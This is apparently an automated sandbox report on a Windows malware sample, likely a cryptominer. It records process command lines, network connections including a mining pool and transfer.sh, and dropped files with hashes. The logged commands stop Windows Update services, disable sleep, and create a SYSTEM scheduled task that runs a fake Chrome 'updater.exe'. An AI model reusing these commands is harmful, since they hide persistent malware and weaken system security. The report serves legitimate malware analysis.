"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2608 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2696 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2832 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/1704-54-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/1704-55-0x0000000000020000-0x0000000000054000-memory.dmp

memory/1704-56-0x0000000000370000-0x0000000000376000-memory.dmp

memory/1704-57-0x0000000000710000-0x0000000000750000-memory.dmp

memory/1704-58-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/1704-59-0x0000000000710000-0x0000000000750000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab69DC.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\Tar6C8E.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a1f0dbc5feb8915041e3741d34930cec
SHA1 3edc2a099a37a41c400fdf5417588fb5a7651e26
SHA256 420596bb3b7cba0fe7b08ee1731543d348b9bebf78a5a045f2a9255f09bf52ce
SHA512 f7373663d559d1b5d5789d14d600c28c3d9c11aa5983e8e846afd35ebd225543582809db8f3aec08c3554de61e5d12b5b3fe055996367b86711d9213f8f9f724

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1912-146-0x0000000004390000-0x00000000055B6000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2436-147-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-148-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2436-149-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-150-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-151-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-152-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-153-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-154-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/1912-155-0x0000000004390000-0x00000000055B6000-memory.dmp

memory/2436-156-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-157-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-162-0x0000000077920000-0x0000000077AC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2232-166-0x0000000000210000-0x000000000049B000-memory.dmp

memory/1704-164-0x000000000C1B0000-0x000000000C43B000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2232-167-0x0000000000210000-0x000000000049B000-memory.dmp

memory/1048-168-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-170-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-176-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1048-178-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1048-181-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-184-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-183-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-182-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-185-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-186-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-187-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-188-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-189-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-190-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-191-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-192-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-193-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1048-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-211-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-261-0x0000000077B1F000-0x0000000077B20000-memory.dmp

memory/1704-262-0x000000000C1B0000-0x000000000C43B000-memory.dmp

memory/2232-267-0x0000000000210000-0x000000000049B000-memory.dmp

memory/2416-268-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/2416-269-0x0000000002250000-0x0000000002258000-memory.dmp

memory/2416-270-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

memory/2416-271-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-273-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-272-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-274-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

memory/2416-275-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-276-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7434eef5797967ed5f579f16eda17a36
SHA1 3e212d805cba7e1e7f06c80121528519e3081ee3
SHA256 79d8ca8a550d9f7848b8e4b2bbd2e6d62f22727347d70a4e5a57cc5bb307e479
SHA512 3cd0133b91878ddec309d42a53b3206f2762b98294f4aff4e6474aea345d89d9e38c3784ac7d42070f40e1afeb48e7e1f9ab6d6a14e837c0dadc046b61a6400e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VHDQHNMG7T93SEJE9BK9.temp

MD5 7434eef5797967ed5f579f16eda17a36
SHA1 3e212d805cba7e1e7f06c80121528519e3081ee3
SHA256 79d8ca8a550d9f7848b8e4b2bbd2e6d62f22727347d70a4e5a57cc5bb307e479
SHA512 3cd0133b91878ddec309d42a53b3206f2762b98294f4aff4e6474aea345d89d9e38c3784ac7d42070f40e1afeb48e7e1f9ab6d6a14e837c0dadc046b61a6400e

memory/3052-283-0x000000001B280000-0x000000001B562000-memory.dmp

memory/3052-284-0x0000000002250000-0x0000000002258000-memory.dmp

memory/3052-286-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-285-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/3052-287-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-289-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-288-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/3052-290-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-291-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2436-295-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2436-296-0x000000013FED0000-0x00000001410F6000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1704-301-0x000000000C170000-0x000000000C7A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1704-305-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/2176-306-0x0000000077B10000-0x0000000077B12000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2132-310-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-312-0x0000000000C20000-0x0000000000C90000-memory.dmp

memory/2176-313-0x0000000073820000-0x0000000073F0E000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1728-315-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-316-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-317-0x0000000002F10000-0x0000000002F7C000-memory.dmp

memory/2176-318-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-319-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1728-320-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2176-321-0x00000000000D0000-0x0000000000704000-memory.dmp

memory/2176-322-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-324-0x0000000003150000-0x0000000003202000-memory.dmp

memory/2132-326-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-332-0x0000000073820000-0x0000000073F0E000-memory.dmp

memory/1728-347-0x000000013F9E0000-0x0000000140C06000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/2176-369-0x0000000005CC0000-0x0000000005D00000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Local State

MD5 e6da6a85878383b7efb0725b3ffa6533
SHA1 bb665aa670ce17593301aaf762002ba2c99518c5
SHA256 980fdc354b3771fc6c4a1e205768bdc4b9f214473da88481e2d807b88ebbbc48
SHA512 8dded67e8d879d9c7804479c994f3d5b79859f98bc8b175c10f08e728a0cb822399f88e66c07964c4116ead3177201dd16eb7daf84c832bd4e46ee2c1cafa8fb

\??\pipe\crashpad_2292_ZFWUGDSUEDLEYQVC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\LOG

MD5 eb0651fa85b42ccfbb99ba6f0b521bbc
SHA1 96c333c6465f9a9a0362ee3fac68969fcfafc603
SHA256 6228546dd2e2a7bce4e70971962ba386a869d4084801dfba0dff87aeb67922e5
SHA512 f1e687afd24ebcd352992184bf8f8bf0ee9a34d21d85557abfee668179e14e1672c33bf10f14beef29f48fdd95e77723fab9523f2ab46410d9a1c3714910dd73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\LOG.old

MD5 f6bfa7b546513ea42975fa47714913d4
SHA1 f89fd1d28f5c2ddc67ccf3723ee0101b4fceb6ea
SHA256 73fc943c4b40df27f343ddb47e94dbe7cc282f549cabbe118edd1c1becf616b3
SHA512 45a43dcc4b0b5c5c02cc872862d02545ede7400033728f2afa7e6728e7a6fe310dcd95d84dff9ab4c47b9df9b261fee96447d48183edef44a69739659cc5f91c

memory/2176-398-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-399-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1728-400-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2176-401-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-405-0x0000000002B50000-0x0000000002B92000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Session Storage\CURRENT~RFf78b165.TMP

